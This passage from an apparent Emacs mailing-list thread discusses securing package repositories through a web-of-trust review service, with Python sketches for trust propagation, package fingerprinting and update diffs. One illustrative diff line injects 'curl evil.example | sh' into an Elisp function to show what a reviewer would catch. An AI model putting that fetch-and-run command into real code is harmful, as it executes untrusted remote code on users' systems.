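becomes trusted once enough already-trusted people vouch for them. The
names and the threshold are invented for illustration:

```python
def trusted_reviewers(seed, vouches, threshold=2):
    """Propagate trust: start from `seed` and repeatedly admit anyone
    vouched for by at least `threshold` already-trusted reviewers.
    `vouches` maps a candidate to the set of people vouching for them."""
    trusted = set(seed)
    changed = True
    while changed:
        changed = False
        for person, backers in vouches.items():
            if person not in trusted and len(backers & trusted) >= threshold:
                trusted.add(person)
                changed = True
    return trusted

vouches = {
    "dana": {"alice", "bob"},     # two seed vouches -> admitted
    "erin": {"dana", "carol"},    # admitted once dana is trusted
    "frank": {"erin"},            # only one voucher -> stays untrusted
}
```

With seed {"alice", "bob", "carol"}, this admits dana, then erin, but
never frank. Real metrics would be fuzzier, but the fixed-point shape is
the same.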

The interesting part, though: this service should most definitely work
across all package repositories. That way, no matter whether you download
from ELPA, MELPA, Marmalade or whatever the future brings, the service is
queried. The crux would be defining a universal way to identify a package
and its version. This could be done through hashes across all .el files,
for example, which all repos obviously deliver and have in common.
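The cross-repository fingerprint could be as simple as hashing a
package's .el files in a canonical order; a sketch (the exact
canonicalization, e.g. line-ending handling, would need to be agreed on
by the repos):

```python
import hashlib
from pathlib import Path

def package_fingerprint(package_dir: str) -> str:
    """Hash all .el files under package_dir in sorted path order, so the
    same sources yield the same identifier regardless of which archive
    (ELPA, MELPA, Marmalade, ...) delivered them."""
    h = hashlib.sha256()
    for path in sorted(Path(package_dir).rglob("*.el")):
        rel = path.relative_to(package_dir).as_posix()
        h.update(rel.encode())     # bind each file's content to its name
        h.update(b"\x00")
        h.update(path.read_bytes())
        h.update(b"\x00")
    return h.hexdigest()
```

Two archives shipping byte-identical sources then map to the same review
record, even if their tarball metadata differs.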

package.el could be extended to display all available metrics on a
package's detail page only, to keep the load on the service down. It
would display the metrics for the current version as well as the overall
metrics (which would be useful if the current version hadn't been rated
yet).

Earlier in this thread, I mentioned I'd like to see better tools for
users, so what about this: a user can comfortably review a package in
Emacs after it is downloaded and before it is loaded (even a batch of
packages). The same goes for updates: he can see diffs between the new
version and the one he has installed. This could easily be combined with
submitting a review or rating to the service mentioned previously.
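The update-diff idea maps onto machinery Emacs already has (diff-mode,
ediff); sketched here in Python with difflib just to show the shape of
the review step (the file contents are invented examples):

```python
import difflib

def update_diff(installed: str, new: str, name: str = "package.el") -> str:
    """Return a unified diff between the installed and the new version
    of a file, for the user to review before the update is activated."""
    return "".join(difflib.unified_diff(
        installed.splitlines(keepends=True),
        new.splitlines(keepends=True),
        fromfile=f"installed/{name}",
        tofile=f"new/{name}",
    ))

old_src = '(defun greet () (message "hi"))\n'
new_src = '(defun greet () (shell-command "curl evil.example | sh"))\n'
# A reviewer scanning update_diff(old_src, new_src) would immediately
# spot the newly introduced shell-command call.
```

A suspicious line appearing in the "+" half of the diff is exactly the
signal a reviewer would attach to a rating.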

Naturally, all of this would be optional; no one would be forced to
participate.

Last but not least: through an API key, all repos could report download
metrics to the service, which would give a _very_ rough clue about how
popular a package is. Thus, we would finally have accumulated metrics
for this and other things across repos.

This is just (again) thinking out loud. But I think this "solution" has
some very promising potential: it is non-invasive to how Emacs currently
works (= no sandbox effort), does not give a false sense of security,
and overall encourages the community to actually review code. And
through all of this, it does, imho, actually increase security.

And if those people who already review code continue to do so, but also
report their findings back to the service and maybe rate other people
they know and trust, this could actually work rather well.

Ideally, the service could be extended in the future to make it a place
where code review for newcomers (new packages) could happen to improve
their work... just like it is done on the list right now.

I'm a bit afraid to ask but what do you guys and gals think? :)

So long,
Matthias
--
Dipl.-Inf. (FH) Matthias Dahl | Software Engineer | binary-island.eu
services: custom software [desktop, mobile, web], server administration
Stephen J. Turnbull
2013-10-02 02:45:13 UTC
Permalink
Post by Matthias Dahl
Maybe this is just wishful thinking, but what if we could channel that
effort into a single, package-repository-independent project?
Please let me explain: the project would mostly build on the web-of-trust
principle. Basically, people can review and rate packages, and in order
to do so, you need a certain level of trust, which you gain through
ratings or endorsements from already-trusted reviewers. Initially those
could be the Emacs and respective package maintainers, and so forth.
It could work. After all, people do write documentation. :-) And this
is something a few non-programmers (a mostly untapped resource) could
put a lot of effort into, because at least at startup there will be a
lot of admin and advocacy to be done. Design of the metrics is going
to be an ongoing effort. The idea of having it be a separate project
means that XEmacs and SXEmacs people can get into the act to some
extent.

However, there is at least one point where your argument is not so
strong: as a sysadmin, I don't review *any* Emacs code---it's not
"mission-critical" on those hosts where I care about
Emacsen security. People who suffer from my style of paranoia have to
reduce the complexity of their environments, or they won't get
anything else done. I suspect that outside of the core development
community there are few doing much reviewing. Also, package
maintainers really shouldn't be trusted initially, because there are
folks who have been maintaining their packages for decades but nobody
really knows them. Of course, those well-known to core can be added
to the trusted group immediately.

Specifically, with respect to Emacsen, I trust that core changes to
XEmacs get reviewed by the reviewers, and on "exposed systems" I use
nothing but what XEmacs calls "core Lisp" plus the "xemacs-base"
and "text-modes" packages (and "text-modes" is stripped of libraries I
don't use). It's a minimal configuration useful for viewing logs and
maintaining configuration files, and the release is several years old.
(XEmacs 21.4.20 -- but Emacs 18.55 would probably do just as well!
Not quite, I do need to be able to decode and display non-ASCII, but I
don't currently ever need to edit it.) But Gnus, calendar, and
jedi.el just aren't even installed on such hosts. I suppose some
people in my position would also install org-mode, but I haven't
caught that bug.